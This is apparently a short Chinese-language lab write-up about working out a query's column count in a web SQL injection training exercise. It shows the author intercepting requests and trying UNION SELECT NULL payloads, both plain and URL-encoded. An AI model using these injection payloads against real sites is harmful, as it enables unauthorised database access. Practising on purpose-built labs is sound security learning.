# Web SQL injection Lab7 本題要找出回傳的欄位數,一樣先進到網站裡。  先攔截請求並修改。 ``` ' UNION SELECT NULL-- ```  會發現直接輸入的話會出錯(沒有反紅),所以我嘗試改成 URL 編碼來解決這個問題。 ``` %27%20UNION%20SELECT%20NULL-- ```  發現改成 URL 編碼還是出錯,因此我嘗試增加欄位數。 ``` s%27%20UNION%20SELECT%20NULL,NULL,NULL-- ``` 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up